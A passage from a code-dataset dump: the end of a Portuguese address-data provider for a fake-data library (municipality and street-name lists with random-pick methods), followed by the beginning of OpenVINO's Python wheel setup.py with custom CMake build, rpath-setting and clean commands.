"Bragança",
"Cabeceiras de Basto",
"Cadaval",
"Caldas da Rainha",
"Calheta (Açores)",
"Calheta (Madeira)",
"Câmara de Lobos",
"Caminha",
"Campo Maior",
"Cantanhede",
"Carrazeda de Ansiães",
"Carregal do Sal",
"Cartaxo",
"Cascais",
"Castanheira de Pêra",
"Castelo Branco",
"Castelo de Paiva",
"Castelo de Vide",
"Castro Daire",
"Castro Marim",
"Castro Verde",
"Celorico da Beira",
"Celorico de Basto",
"Chamusca",
"Chaves",
"Cinfães",
"Coimbra",
"Condeixa-a-Nova",
"Constância",
"Coruche",
"Corvo",
"Covilhã",
"Crato",
"Cuba",
"Elvas",
"Entroncamento",
"Espinho",
"Esposende",
"Estarreja",
"Estremoz",
"Évora",
"Fafe",
"Faro",
"Felgueiras",
"Ferreira do Alentejo",
"Ferreira do Zêzere",
"Figueira da Foz",
"Figueira de Castelo Rodrigo",
"Figueiró dos Vinhos",
"Fornos de Algodres",
"Freixo de Espada à Cinta",
"Fronteira",
"Funchal",
"Fundão",
"Gavião",
"Góis",
"Golegã",
"Gondomar",
"Gouveia",
"Grândola",
"Guarda",
"Guimarães",
"Horta",
"Idanha-a-Nova",
"Ílhavo",
"Lagoa",
"Lagoa (Açores)",
"Lagos",
"Lajes das Flores",
"Lajes do Pico",
"Lamego",
"Leiria",
"Lisboa",
"Loulé",
"Loures",
"Lourinhã",
"Lousã",
"Lousada",
"Mação",
"Macedo de Cavaleiros",
"Machico",
"Madalena",
"Mafra",
"Maia",
"Mangualde",
"Manteigas",
"Marco de Canaveses",
"Marinha Grande",
"Marvão",
"Matosinhos",
"Mealhada",
"Mêda",
"Melgaço",
"Mértola",
"Mesão Frio",
"Mira",
"Miranda do Corvo",
"Miranda do Douro",
"Mirandela",
"Mogadouro",
"Moimenta da Beira",
"Moita",
"Monção",
"Monchique",
"Mondim de Basto",
"Monforte",
"Montalegre",
"Montemor-o-Novo",
"Montemor-o-Velho",
"Montijo",
"Mora",
"Mortágua",
"Moura",
"Mourão",
"Murça",
"Murtosa",
"Nazaré",
"Nelas",
"Nisa",
"Nordeste",
"Óbidos",
"Odemira",
"Odivelas",
"Oeiras",
"Oleiros",
"Olhão",
"Oliveira de Azeméis",
"Oliveira de Frades",
"Oliveira do Bairro",
"Oliveira do Hospital",
"Ourém",
"Ourique",
"Ovar",
"Paços de Ferreira",
"Palmela",
"Pampilhosa da Serra",
"Paredes",
"Paredes de Coura",
"Pedrógão Grande",
"Penacova",
"Penafiel",
"Penalva do Castelo",
"Penamacor",
"Penedono",
"Penela",
"Peniche",
"Peso da Régua",
"Pinhel",
"Pombal",
"Ponta Delgada",
"Ponta do Sol",
"Ponte da Barca",
"Ponte de Lima",
"Ponte de Sor",
"Portalegre",
"Portel",
"Portimão",
"Porto",
"Porto de Mós",
"Porto Moniz",
"Porto Santo",
"Póvoa de Lanhoso",
"Póvoa de Varzim",
"Povoação",
"Praia da Vitória",
"Proença-a-Nova",
"Redondo",
"Reguengos de Monsaraz",
"Resende",
"Ribeira Brava",
"Ribeira de Pena",
"Ribeira Grande",
"Rio Maior",
"Sabrosa",
"Sabugal",
"Salvaterra de Magos",
"Santa Comba Dão",
"Santa Cruz",
"Santa Cruz da Graciosa",
"Santa Cruz das Flores",
"Santa Maria da Feira",
"Santa Marta de Penaguião",
"Santana",
"Santarém",
"Santiago do Cacém",
"Santo Tirso",
"São Brás de Alportel",
"São João da Madeira",
"São João da Pesqueira",
"São Pedro do Sul",
"São Roque do Pico",
"São Vicente (Madeira)",
"Sardoal",
"Sátão",
"Seia",
"Seixal",
"Sernancelhe",
"Serpa",
"Sertã",
"Sesimbra",
"Setúbal",
"Sever do Vouga",
"Silves",
"Sines",
"Sintra",
"Sobral de Monte Agraço",
"Soure",
"Sousel",
"Tábua",
"Tabuaço",
"Tarouca",
"Tavira",
"Terras de Bouro",
"Tomar",
"Tondela",
"Torre de Moncorvo",
"Torres Novas",
"Torres Vedras",
"Trancoso",
"Trofa",
"Vagos",
"Vale de Cambra",
"Valença",
"Valongo",
"Valpaços",
"Velas",
"Vendas Novas",
"Viana do Alentejo",
"Viana do Castelo",
"Vidigueira",
"Vieira do Minho",
"Vila de Rei",
"Vila do Bispo",
"Vila do Conde",
"Vila do Porto",
"Vila Flor",
"Vila Franca de Xira",
"Vila Franca do Campo",
"Vila Nova da Barquinha",
"Vila Nova de Cerveira",
"Vila Nova de Famalicão",
"Vila Nova de Foz Côa",
"Vila Nova de Gaia",
"Vila Nova de Paiva",
"Vila Nova de Poiares",
"Vila Pouca de Aguiar",
"Vila Real",
"Vila Real de Santo António",
"Vila Velha de Ródão",
"Vila Verde",
"Vila Viçosa",
"Vimioso",
"Vinhais",
"Viseu",
"Vizela",
"Vouzela",
]
# from https://pt.wikipedia.org/wiki/Lista_de_arruamentos_de_Lisboa
# and https://pt.wikipedia.org/wiki/Lista_de_arruamentos_do_Porto
places = (
"da Igreja",
"António Sérgio",
"Cardeal Cerejeira",
"Coronel Marques Júnior",
"da Encarnação",
"da Música",
"da Quinta de Santo António",
"da Universidade",
"das Comunidades Portuguesas",
"das Linhas de Torres",
"de Santo António dos Capuchos",
"do Beato",
"Dom Afonso Henriques",
"dos Oceanos",
"dos Pinheiros",
"Edgar Cardoso",
"Mahatma Gandhi",
"Manuel Ricardo Espírito Santo",
"Padre Álvaro Proença",
"Roentgen",
"da Boavista",
"da Cova da Moura",
"das Conchas",
"de Caselas",
"de São Francisco",
"do Carvalhão",
"do Longo",
"do Penalva",
"do Varejão",
"dos Moinhos",
"da Conceição",
"das Portas do Mar",
"de Jesus",
"do Evaristo",
"do Rosário",
"Escuro",
"Grande de Cima",
"Areeiro",
"Campolide",
"Madrid",
"Paris (Nascente)",
"Paris (Poente)",
"Roma",
"Sabugosa",
"Novo (à Travessa das Águas Boas)",
"da Ponte da Lama",
"da Praia da Galé",
"do Duro",
"dos Ferreiros",
"das Rolas",
"da Lingueta",
"das Naus",
"do Olival",
"do Sodré",
"dos Argonautas",
"Português",
"da Figueira",
"de Santo Estêvão",
"de São Lourenço",
"de São Miguel",
"do Tijolo",
"dos Olivais",
"da Feiteira",
"da Rainha",
"da Raposa",
"das Andorinhas",
"das Cegonhas",
"das Gaivotas ao Parque das Nações",
"de Baixo da Penha",
"de Palma de Cima",
"do Alto do Varejão",
"do Arboreto",
"dos Estorninhos",
"dos Flamingos",
"dos Melros",
"dos Pardais",
"dos Pinheiros ao Parque das Nações",
"dos Rouxinóis",
"Velho do Outeiro",
"das Amoreiras",
"das Cebolas",
"de Santa Clara",
"dos Mártires da Pátria",
"Grande",
"Pequeno",
"de Campolide",
"da Graça",
"de Colares",
"Norte do Bairro da Encarnação",
"Sul do Bairro da Encarnação",
"da Torrinha",
"do Castelo",
"de Santa Helena",
"da Sé",
"das Bolas",
"das Chagas",
"José António Marques",
"do Monte",
"Gerais",
"D. Carlos I ao Parque das Nações",
"Adão Barata",
"Alfredo Keil",
"Alice Cruz",
"Amália Rodrigues",
"Amélia Carvalheira",
"Amnistia Internacional",
"Augusto Monjardino",
"Bento Martins",
"das Nações",
"Ducla Soares",
"Eduardo Prado Coelho",
"Elisa Baptista de Sousa Pedroso",
"Fernanda de Castro",
"Fernando Pessa",
"Ferreira de Mira",
"Garcia de Orta ao Parque das Nações",
"Irmã Lúcia",
"Jorge Luis Borges",
"Luís Ferreira",
"Maria da Luz Ponces de Carvalho",
"Maria de Lourdes Sá Teixeira",
"Maria José Moura",
"Mário Ruivo",
"Mário Soares",
"9 de Abril",
"Prof. António de Sousa Franco",
"Prof. Francisco Caldeira Cabral",
"Pulido Garcia",
"Tristão da Silva",
"Ribeirinhos",
"Sophia de Mello Breyner Andresen",
"do Mirante",
"do Alto de São João",
"General Afonso Botelho",
"Eduardo VII de Inglaterra",
"Silva Porto",
"Artur Agostinho",
"da Ilha dos Amores",
"da Nau Catrineta",
"da Vila Expo",
"das Âncoras",
"das Fragatas",
"das Garças",
"das Gáveas ao Parque das Nações",
"das Musas",
"das Tágides",
"de Neptuno",
"de Ulisses",
"do Adamastor",
"do Amazonas",
"do Báltico",
"do Campo da Bola",
"do Cantábrico",
"do Levante",
"do Parque",
"do Ródano",
"do Sapal",
"do Tejo",
"do Trancão",
"dos Aventureiros",
"dos Cruzados",
"dos Fenícios",
"dos Heróis do Mar",
"dos Jacarandás",
"dos Mastros",
"dos Navegadores",
"João Jayme Faria Affonso",
"Júlio Verne",
"Afonso de Albuquerque",
"da Cruz",
"da Galega",
"das Canas",
"das Galeotas ao Parque das Nações",
"das Pirogas",
"de Dom Fradique",
"do Carrasco",
"do Peneireiro",
"do Pimenta",
"do Pinzaleiro",
"do Seabra",
"do Sequeiro",
"do Sextante",
"do Tronco",
"dos Escaleres",
"do Borratém",
"do Mar",
"Adolfo Ayala",
"Cuf",
"da Quinta de São João Baptista",
"da Quinta do Guarda-Mor",
"da Rua Duque de Palmela",
"das Torres do Restelo",
"do Chinquilho",
"Fernando Valle",
"Maestro Ivo Cruz",
"Prof. António José Saraiva",
"Professor Gonçalves Ferreira",
"Professor José Conde",
"Teófilo Ferreira",
"das Necessidades",
"do Mercado",
"dos Anjos",
"do Conde de Óbidos",
"de Palma",
"Almirante Pinheiro de Azevedo",
"António Dias Lourenço",
"Coronel Vítor Alves",
"da Expo 98",
"das Olaias",
"das Oliveiras",
"de Pina Manique",
"dos Vice-reis",
"Matilde Bensaúde",
"Nelson Mandela",
"Pupilos do Exército",
"República Argentina",
"República da Colômbia",
"Visconde de Alvalade",
"do Barcal",
"do Calhau",
"de São Vicente",
"das Ondas",
"dos Corvos",
"Feia",
"Arquitecto Carlos Ramos",
"das Antas",
"das Fontainhas",
"de 25 de Abril",
"de Aquilino Ribeiro",
"de Basílio Teles",
"de Cartes",
"de Cláudio Carneiro",
"de Eça de Queirós",
"de Manuel d'Arriaga",
"do Dr. António Macedo",
"do Dr. Fernando de Azeredo Antas",
"do Prof. Hernâni Monteiro",
"do Prof. Ruy Luís Gomes",
"dos Capitães de Abril",
"25 de Abril",
"da Associação Empresarial de Portugal",
"da França",
"de Camilo",
"de D. Afonso Henriques",
"de D. Carlos I",
"de D. João II",
"de Fernão de Magalhães",
"de Fontes Pereira de Melo",
"de Gustavo Eiffel",
"de Montevideu",
"de Nun'Álvares Pereira",
"de Paiva Couceiro",
"de Rodrigues de Freitas",
"de Sidónio Pais",
"de Vasco da Gama",
"de Vímara Peres",
"do Bessa",
"do Brasil (Porto)",
"do Conselho da Europa",
"do Dr. Antunes Guimarães",
"do Marechal Gomes da Costa",
"dos Aliados",
"dos Combatentes da Grande Guerra",
"Flor da Rosa",
"José Domingues dos Santos",
"da Agra do Amial",
"da Fonte da Moura",
"da Pasteleira",
"da Rainha D. Leonor",
"de Costa Cabral",
"de Francos",
"de Manuel Cardoso Agrelos",
"de Pio XII",
"de Ramalde",
"de São João de Deus",
"de São Roque da Lameira",
"de São Vicente de Paulo",
"de Santo Eugénio",
"do Aleixo",
"do Bom Sucesso",
"do Carvalhido",
"do Cerco do Porto",
"do Dr. Nuno Pinheiro Torres",
"do Falcão",
"do Lagarteiro",
"do Leal",
"do Outeiro",
"do Regado",
"do Viso",
"Herculano",
"Central",
"da Bela Vista",
"da Beneditina",
"da Senhora da Luz",
"de Bonjóia",
"de Carreiras",
"de Passos Manuel",
"de S. João da Foz",
"de S. Macário",
"de S. Marçal",
"do Arrabalde",
"do Campo",
"do Campo Alegre",
"do Machado",
"do Meiral",
"do Paço",
"do Pedregulho",
"do Preto",
"de Baixo",
"de Cima",
"da Alfândega",
"da Estiva",
"da Ribeira",
"das Pedras",
"do Bicalho",
"dos Guindais",
"da Arrábida",
"da Boa Viagem",
"da Póvoa",
"da Ranha",
"das Carquejeiras",
"das Laranjeiras",
"das Virtudes",
"de Chaves de Oliveira",
"de D. Pedro Pitões",
"de Godim",
"de João do Carmo",
"de Maceda",
"de Marques Marinho",
"de Monchique",
"de Nova Sintra",
"de São Pedro",
"de Serrúbia",
"de Sobre-o-Douro",
"de Vandoma",
"do Calvário",
"do Carregal",
"do Forno Velho",
"do Monte da Lapa",
"do Monte de S. João",
"do Ouro",
"do Rego Lameiro",
"dos Ingleses",
"da Fonte de Cima",
"das Congostas",
"da Asprela",
"de Vinte e Quatro de Agosto",
"do Rou",
"de Antero de Quental",
"de Estêvão Vasconcelos",
"de Viterbo de Campos",
"do Dr. Manuel Laranjeira",
"Carolina Michaelis de Vasconcelos",
"da Vitória",
"das Sereias",
"das Verdades",
"de S. Francisco de Borja",
"do Adro",
"do Barredo",
"do Caminho Novo",
"do Cidral de Baixo",
"do Cidral de Cima",
"do Codeçal",
"do Colégio",
"do Monte Cativo",
"do Monte dos Judeus",
"do Pinheiro",
"do Recanto",
"do Roleto",
"dos Armazéns",
"do Molhe",
"da Circunvalação",
"de Gondomar",
"Nacional 108",
"Nacional 209",
"de Moradias Populares do Eng.º Machado Vaz",
"de Moradais Populares do Carriçal",
"de Antero de Figueiredo",
"de Arnaldo Gama",
"de Belém",
"de Carrilho Videira",
"de Guedes de Oliveira",
"de João Chagas",
"de Marques de Oliveira",
"de Teófilo Braga",
"do Moreda",
"do Passeio Alegre",
"Machado de Asis",
"Severo Portela",
"da Foz",
"do Bolhão",
"dos Bacalhoeiros",
"da Luz",
"do Seminário",
"S. Bartolomeu",
"de S. Lázaro",
"das Escadas do Monte dos Judeus",
"das Japoneiras",
"de S. Salvador",
"do Bonjardim",
"de Luiz I",
"de Maria Pia",
"do Freixo",
"do Carvão",
"da Banda de Ramalde",
"da Cidade da Praia",
"das Mimosas",
"de Adelino Amaro da Costa",
"de Augusto Gomes",
"de Bernarda Ferreira Lacerda",
"de Eduardo Soares",
"de Francisco Borges",
"de Irene de Castro",
"de João Augusto Ribeiro",
"de José Régio",
"de José Serra",
"de Luís António Verney",
"de Públia Hortênsia",
"de Ribeiro Sanches",
"de S. Mamede",
"do Dr. Jaime Cortesão",
"do Maestro Afonso Valentim",
"do Maestro Resende Dias",
"do Mestre de Aviz",
"do Prof. Egas Moniz",
"Egito Gonçalves",
"Ernesto Veiga de Oliveira",
"João Glama",
"José Luís Nunes",
"Manuel Gonçalves Moreira",
"Artur Cupertino de Miranda",
"Associação Empresarial de Portugal",
"Manuel Pinto de Azevedo Júnior",
"Goelas de Pau",
"de Cintura Interna",
"do Almirante Gago Coutinho",
"do Castelo do Queijo",
"Futebol Clube do Porto",
"Panorâmica",
"Panorâmica Edgar Cardoso",
"de Gonçalo Cristóvão",
"do Cais das Pedras",
"da Aldeia",
"da Baleia",
"da Bouça",
"da Carvalhosa",
"da Companhia",
"da Ilha do Ferro",
"da Pedreira",
"da Senhora da Lapa",
"das Andrezas",
"de Grijó",
"de Lamas",
"de S. Brás",
"de Santana",
"do Anjo",
"do Anjo da Guarda",
"do Buraco",
"do José da Mestra",
"do Monte da Pena",
"do Picoto",
"do Sobreirinho",
)
def street_prefix(self) -> str:
"""
:example: 'Rua'
"""
return self.random_element(self.street_prefixes)
def city_name(self) -> str:
"""
:example: 'Amora'
"""
return self.random_element(self.cities)
def administrative_unit(self) -> str:
"""
:example: 'Bragança'
"""
return self.random_element(self.distritos)
distrito = administrative_unit
def concelho(self) -> str:
"""
:example: 'Tondela'
"""
return self.random_element(self.concelhos)
def freguesia(self) -> str:
"""
:example: 'Miranda do Douro'
"""
return self.random_element(self.freguesias)
def place_name(self) -> str:
"""
:example: "do Pombal"
"""
return self.random_element(self.places)
|
py | b415d13cb437939d6150a216e1678c080bf83c02 | # -*- coding: utf-8 -*-
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os.path
import sys
import errno
import subprocess # nosec
import typing
import platform
import multiprocessing
from fnmatch import fnmatchcase
from pathlib import Path
from shutil import copyfile, rmtree
from distutils.command.build import build
from distutils.command.clean import clean
from distutils.errors import DistutilsSetupError
from distutils.file_util import copy_file
from distutils import log
from setuptools import setup, find_namespace_packages, Extension
from setuptools.command.build_ext import build_ext
from setuptools.command.build_clib import build_clib
from setuptools.command.install import install
from decouple import config
WHEEL_LIBS_INSTALL_DIR = os.path.join('openvino', 'libs')
WHEEL_LIBS_PACKAGE = 'openvino.libs'
PYTHON_VERSION = f'python{sys.version_info.major}.{sys.version_info.minor}'
LIBS_DIR = 'bin' if platform.system() == 'Windows' else 'lib'
CONFIG = 'Release' if platform.system() == 'Windows' else ''
machine = platform.machine()
if machine == 'x86_64' or machine == 'AMD64':
ARCH = 'intel64'
elif machine == 'X86':
ARCH = 'ia32'
elif machine == 'arm':
ARCH = 'arm'
elif machine == 'aarch64':
ARCH = 'arm64'
# The following variables can be defined in environment or .env file
CMAKE_BUILD_DIR = config('CMAKE_BUILD_DIR', '.')
CORE_LIBS_DIR = config('CORE_LIBS_DIR', f'deployment_tools/inference_engine/{LIBS_DIR}/{ARCH}/{CONFIG}')
PLUGINS_LIBS_DIR = config('PLUGINS_LIBS_DIR', f'deployment_tools/inference_engine/{LIBS_DIR}/{ARCH}/{CONFIG}')
NGRAPH_LIBS_DIR = config('NGRAPH_LIBS_DIR', 'deployment_tools/ngraph/lib')
TBB_LIBS_DIR = config('TBB_LIBS_DIR', f'deployment_tools/inference_engine/external/tbb/{LIBS_DIR}')
PY_PACKAGES_DIR = config('PY_PACKAGES_DIR', f'python/{PYTHON_VERSION}')
LIBS_RPATH = '$ORIGIN' if sys.platform == 'linux' else '@loader_path'
LIB_INSTALL_CFG = {
'ie_libs': {
'name': 'core',
'prefix': 'libs.core',
'install_dir': CORE_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'hetero_plugin': {
'name': 'hetero',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'gpu_plugin': {
'name': 'gpu',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'cpu_plugin': {
'name': 'cpu',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'multi_plugin': {
'name': 'multi',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'myriad_plugin': {
'name': 'myriad',
'prefix': 'libs.plugins',
'install_dir': PLUGINS_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'ngraph_libs': {
'name': 'ngraph',
'prefix': 'libs.ngraph',
'install_dir': NGRAPH_LIBS_DIR,
'rpath': LIBS_RPATH,
},
'tbb_libs': {
'name': 'tbb',
'prefix': 'libs.tbb',
'install_dir': TBB_LIBS_DIR,
'rpath': LIBS_RPATH,
},
}
PY_INSTALL_CFG = {
'ie_py': {
'name': PYTHON_VERSION,
'prefix': 'site-packages',
'install_dir': PY_PACKAGES_DIR,
},
'ngraph_py': {
'name': f'pyngraph_{PYTHON_VERSION}',
'prefix': 'site-packages',
'install_dir': PY_PACKAGES_DIR,
},
}
class PrebuiltExtension(Extension):
"""Initialize Extension"""
def __init__(self, name, sources, *args, **kwargs):
if len(sources) != 1:
nln = '\n'
raise DistutilsSetupError(f'PrebuiltExtension can accept only one source, but got: {nln}{nln.join(sources)}')
super().__init__(name, sources, *args, **kwargs)
class CustomBuild(build):
"""Custom implementation of build_clib"""
cmake_build_types = ['Release', 'Debug', 'RelWithDebInfo', 'MinSizeRel']
user_options = [
('config=', None, 'Build configuration [{types}].'.format(types='|'.join(cmake_build_types))),
('jobs=', None, 'Specifies the number of jobs to use with make.'),
('cmake-args=', None, 'Additional options to be passed to CMake.'),
]
def initialize_options(self):
"""Set default values for all the options that this command supports."""
super().initialize_options()
self.build_base = 'build'
self.config = None
self.jobs = None
self.cmake_args = None
def finalize_options(self):
"""Set final values for all the options that this command supports."""
super().finalize_options()
if not self.config:
if self.debug:
self.config = 'Debug'
else:
self.announce('Set default value for CMAKE_BUILD_TYPE = Release.', level=4)
self.config = 'Release'
else:
build_types = [item.lower() for item in self.cmake_build_types]
try:
i = build_types.index(str(self.config).lower())
self.config = self.cmake_build_types[i]
self.debug = True if 'Debug' == self.config else False
except ValueError:
self.announce('Unsupported CMAKE_BUILD_TYPE value: ' + self.config, level=4)
self.announce('Supported values: {types}'.format(types=', '.join(self.cmake_build_types)), level=4)
sys.exit(1)
if self.jobs is None and os.getenv('MAX_JOBS') is not None:
self.jobs = os.getenv('MAX_JOBS')
self.jobs = multiprocessing.cpu_count() if self.jobs is None else int(self.jobs)
def run(self):
global CMAKE_BUILD_DIR
self.jobs = multiprocessing.cpu_count()
plat_specifier = '.{0}-{1}.{2}'.format(self.plat_name, *sys.version_info[:2])
self.build_temp = os.path.join(self.build_base, 'temp' + plat_specifier, self.config)
# if setup.py is directly called use CMake to build product
if CMAKE_BUILD_DIR == '.':
# set path to the root of OpenVINO CMakeList file
openvino_root_dir = Path(__file__).resolve().parents[4]
self.announce(f'Configuring cmake project: {openvino_root_dir}', level=3)
self.spawn(['cmake', '-H' + str(openvino_root_dir), '-B' + self.build_temp,
'-DCMAKE_BUILD_TYPE={type}'.format(type=self.config),
'-DENABLE_PYTHON=ON',
'-DNGRAPH_ONNX_FRONTEND_ENABLE=ON'])
self.announce('Building binaries', level=3)
self.spawn(['cmake', '--build', self.build_temp,
'--config', self.config, '-j', str(self.jobs)])
CMAKE_BUILD_DIR = self.build_temp
self.run_command('build_clib')
build.run(self)
# Copy extra package_data content filtered by find_packages
dst = Path(self.build_lib)
src = Path(get_package_dir(PY_INSTALL_CFG))
exclude = ignore_patterns('*ez_setup*', '*__pycache__*', '*.egg-info*')
for path in src.glob('**/*'):
if path.is_dir() or exclude(str(path)):
continue
path_rel = path.relative_to(src)
(dst / path_rel.parent).mkdir(exist_ok=True, parents=True)
copyfile(path, dst / path_rel)
class PrepareLibs(build_clib):
"""Prepare prebuilt libraries"""
def run(self):
self.configure(LIB_INSTALL_CFG)
self.configure(PY_INSTALL_CFG)
self.generate_package(get_dir_list(LIB_INSTALL_CFG))
def configure(self, install_cfg):
"""Collect prebuilt libraries. Install them to the temp directories, set rpath."""
for comp, comp_data in install_cfg.items():
install_prefix = comp_data.get('prefix')
install_dir = comp_data.get('install_dir')
if install_dir and not os.path.isabs(install_dir):
install_dir = os.path.join(install_prefix, install_dir)
self.announce(f'Installing {comp}', level=3)
self.spawn(['cmake', '--install', CMAKE_BUILD_DIR, '--prefix', install_prefix, '--component', comp_data.get('name')])
# set rpath if applicable
if sys.platform != 'win32' and comp_data.get('rpath'):
file_types = ['.so'] if sys.platform == 'linux' else ['.dylib', '.so']
for path in filter(lambda p: any(item in file_types for item in p.suffixes), Path(install_dir).glob('*')):
set_rpath(comp_data['rpath'], os.path.realpath(path))
def generate_package(self, src_dirs):
"""
Collect package data files from preinstalled dirs and
put all runtime libraries to the subpackage
"""
# additional blacklist filter, just to fix cmake install issues
blacklist = ['.lib', '.pdb', '_debug.dll', '_debug.dylib']
package_dir = os.path.join(get_package_dir(PY_INSTALL_CFG), WHEEL_LIBS_INSTALL_DIR)
for src_dir in src_dirs:
local_base_dir = Path(src_dir)
for file_path in local_base_dir.rglob('*'):
file_name = os.path.basename(file_path)
if file_path.is_file() and not any(file_name.endswith(ext) for ext in blacklist):
dst_file = os.path.join(package_dir, os.path.relpath(file_path, local_base_dir))
os.makedirs(os.path.dirname(dst_file), exist_ok=True)
copyfile(file_path, dst_file)
if Path(package_dir).exists():
self.announce(f'Adding {WHEEL_LIBS_PACKAGE} package', level=3)
packages.append(WHEEL_LIBS_PACKAGE)
package_data.update({WHEEL_LIBS_PACKAGE: ['*']})
class CopyExt(build_ext):
"""Copy extension files to the build directory"""
def run(self):
if len(self.extensions) == 1:
self.run_command('build_clib')
self.extensions = []
self.extensions = find_prebuilt_extensions(get_dir_list(PY_INSTALL_CFG))
for extension in self.extensions:
if not isinstance(extension, PrebuiltExtension):
raise DistutilsSetupError(f'copy_ext can accept PrebuiltExtension only, but got {extension.name}')
src = extension.sources[0]
dst = self.get_ext_fullpath(extension.name)
os.makedirs(os.path.dirname(dst), exist_ok=True)
# setting relative path to find dlls
if sys.platform != 'win32':
rpath = os.path.relpath(get_package_dir(PY_INSTALL_CFG), os.path.dirname(src))
if sys.platform == 'linux':
rpath = os.path.join('$ORIGIN', rpath, WHEEL_LIBS_INSTALL_DIR)
elif sys.platform == 'darwin':
rpath = os.path.join('@loader_path', rpath, WHEEL_LIBS_INSTALL_DIR)
set_rpath(rpath, os.path.realpath(src))
copy_file(src, dst, verbose=self.verbose, dry_run=self.dry_run)
class CustomInstall(install):
"""Enable build_clib during the installation"""
def run(self):
self.run_command('build')
install.run(self)
class CustomClean(clean):
"""Clean up staging directories"""
def clean(self, install_cfg):
for comp, comp_data in install_cfg.items():
install_prefix = comp_data.get('prefix')
self.announce(f'Cleaning {comp}: {install_prefix}', level=3)
if os.path.exists(install_prefix):
rmtree(install_prefix)
def run(self):
self.clean(LIB_INSTALL_CFG)
self.clean(PY_INSTALL_CFG)
clean.run(self)
def ignore_patterns(*patterns):
"""
Filter names by given patterns
"""
return lambda name: any(fnmatchcase(name, pat=pat) for pat in patterns)
def is_tool(name):
"""Check if the command-line tool is available"""
try:
devnull = subprocess.DEVNULL
subprocess.Popen([name], stdout=devnull, stderr=devnull).communicate() # nosec
except OSError as error:
if error.errno == errno.ENOENT:
return False
return True
def remove_rpath(file_path):
"""
Remove rpath from binaries
:param file_path: binary path
:type file_path: pathlib.Path
"""
if sys.platform == 'darwin':
cmd = (
f'otool -l {file_path} ' # noqa: P103
f'| grep LC_RPATH -A3 '
f'| grep -o "path.*" '
f'| cut -d " " -f2 '
f'| xargs -I{{}} install_name_tool -delete_rpath {{}} {file_path}'
)
if os.WEXITSTATUS(os.system(cmd)) != 0: # nosec
sys.exit(f'Could not remove rpath for {file_path}')
else:
sys.exit(f'Unsupported platform: {sys.platform}')
def set_rpath(rpath, executable):
"""Setting rpath for linux and macOS libraries"""
print(f'Setting rpath {rpath} for {executable}') # noqa: T001
cmd = []
rpath_tool = ''
if sys.platform == 'linux':
with open(os.path.realpath(executable), 'rb') as file:
if file.read(1) != b'\x7f':
log.warn(f'WARNING: {executable}: missed ELF header')
return
rpath_tool = 'patchelf'
cmd = [rpath_tool, '--set-rpath', rpath, executable]
elif sys.platform == 'darwin':
rpath_tool = 'install_name_tool'
cmd = [rpath_tool, '-add_rpath', rpath, executable]
else:
sys.exit(f'Unsupported platform: {sys.platform}')
if is_tool(rpath_tool):
if sys.platform == 'darwin':
remove_rpath(executable)
ret_info = subprocess.run(cmd, check=True, shell=False) # nosec
if ret_info.returncode != 0:
sys.exit(f'Could not set rpath: {rpath} for {executable}')
else:
sys.exit(f'Could not found {rpath_tool} on the system, ' f'please make sure that this tool is installed')
def find_prebuilt_extensions(search_dirs):
"""collect prebuilt python extensions"""
extensions = []
ext_pattern = ''
if sys.platform == 'linux':
ext_pattern = '**/*.so'
elif sys.platform == 'win32':
ext_pattern = '**/*.pyd'
elif sys.platform == 'darwin':
ext_pattern = '**/*.so'
for base_dir in search_dirs:
for path in Path(base_dir).glob(ext_pattern):
if path.match('openvino/libs/*'):
continue
relpath = path.relative_to(base_dir)
if relpath.parent != '.':
package_names = str(relpath.parent).split(os.path.sep)
else:
package_names = []
package_names.append(path.name.split('.', 1)[0])
name = '.'.join(package_names)
extensions.append(PrebuiltExtension(name, sources=[str(path)]))
if not extensions:
extensions.append(PrebuiltExtension('openvino', sources=[str('setup.py')]))
return extensions
def get_description(desc_file_path):
"""read description from README.md"""
with open(desc_file_path, 'r', encoding='utf-8') as fstream:
description = fstream.read()
return description
def get_dependencies(requirements_file_path):
"""read dependencies from requirements.txt"""
with open(requirements_file_path, 'r', encoding='utf-8') as fstream:
dependencies = fstream.read()
return dependencies
def get_dir_list(install_cfg):
"""collect all available directories with libs or python packages"""
dirs = []
for comp_info in install_cfg.values():
cfg_prefix = comp_info.get('prefix')
cfg_dir = comp_info.get('install_dir')
if cfg_dir:
if not os.path.isabs(cfg_dir):
cfg_dir = os.path.join(cfg_prefix, cfg_dir)
if cfg_dir not in dirs:
dirs.append(cfg_dir)
return dirs
def get_package_dir(install_cfg):
"""
Get python package path based on config
All the packages should be located in one directory
"""
py_package_path = ''
dirs = get_dir_list(install_cfg)
if len(dirs) != 0:
# setup.py support only one package directory, all modules should be located there
py_package_path = dirs[0]
return py_package_path
platforms = ['linux', 'win32', 'darwin']
if not any(pl in sys.platform for pl in platforms):
sys.exit(f'Unsupported platform: {sys.platform}, expected: linux, win32, darwin')
# copy license file into the build directory
package_license = config('WHEEL_LICENSE', '')
if os.path.exists(package_license):
copyfile(package_license, 'LICENSE')
packages = find_namespace_packages(get_package_dir(PY_INSTALL_CFG))
package_data: typing.Dict[str, list] = {}
pkg_name = config('WHEEL_PACKAGE_NAME', 'openvino')
ext_modules = find_prebuilt_extensions(get_dir_list(PY_INSTALL_CFG)) if pkg_name == 'openvino' else []
setup(
version=config('WHEEL_VERSION', '0.0.0'),
build=config('WHEEL_BUILD', '000'),
author_email=config('WHEEL_AUTHOR_EMAIL', '[email protected]'),
name=pkg_name,
license=config('WHEEL_LICENCE_TYPE', 'OSI Approved :: Apache Software License'),
author=config('WHEEL_AUTHOR', 'Intel Corporation'),
description=config('WHEEL_DESC', 'Inference Engine Python* API'),
install_requires=get_dependencies(config('WHEEL_REQUIREMENTS', 'meta/openvino.requirements.txt')),
long_description=get_description(config('WHEEL_OVERVIEW', 'meta/pypi_overview.md')),
long_description_content_type='text/markdown',
download_url=config('WHEEL_DOWNLOAD_URL', 'https://github.com/openvinotoolkit/openvino/tags'),
url=config('WHEEL_URL', 'https://docs.openvinotoolkit.org/latest/index.html'),
cmdclass={
'build': CustomBuild,
'install': CustomInstall,
'build_clib': PrepareLibs,
